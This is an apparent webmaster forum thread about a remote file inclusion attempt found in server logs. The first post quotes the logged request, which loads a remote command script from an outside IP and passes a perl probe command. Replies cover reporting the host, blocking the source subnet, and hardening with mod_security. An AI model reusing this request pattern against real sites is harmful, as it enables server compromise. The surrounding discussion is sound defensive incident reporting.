IP according to REMOTE_ADDR: 66.237.65.142

Trying to run this script:

http://67.18.54.212/~greg/cmd.txt

method:
SERVER * REQUEST_URI : /index.php?name=http://67.18.54.212/~greg/cmd.txt&cmd=perl%20-e%20\"print%20q(jSVowMsd)\"


Script ID is The Planet. I informed them a week ago but still running.

404 error now.

Ran into the same thing myself on the 21rst. Notified ThePlanet with the details but never heard back. Glad to see they shut it down.

The bigger problem though, is that the request initiated from 66.237.65.145. So either they have an insecure Server or somebody there was doing something they shouldn't. Even with TP shutting down the "~greg" site, what's not to say they'll upload the script somewhere else and continue doing the same thing?

That's why I just blocked the whole 66.237.65 Class from our Servers -- just incase they decide to come back. ;)

I get so many of those I do not usually bother reporting them because it would take so many hours each week. If you are running mod_security, tweak your system permissions/chmod, and disable unneeded php functions you should have few problems with these types of scripts. Not saying will stop everything but for now it does a very good job :)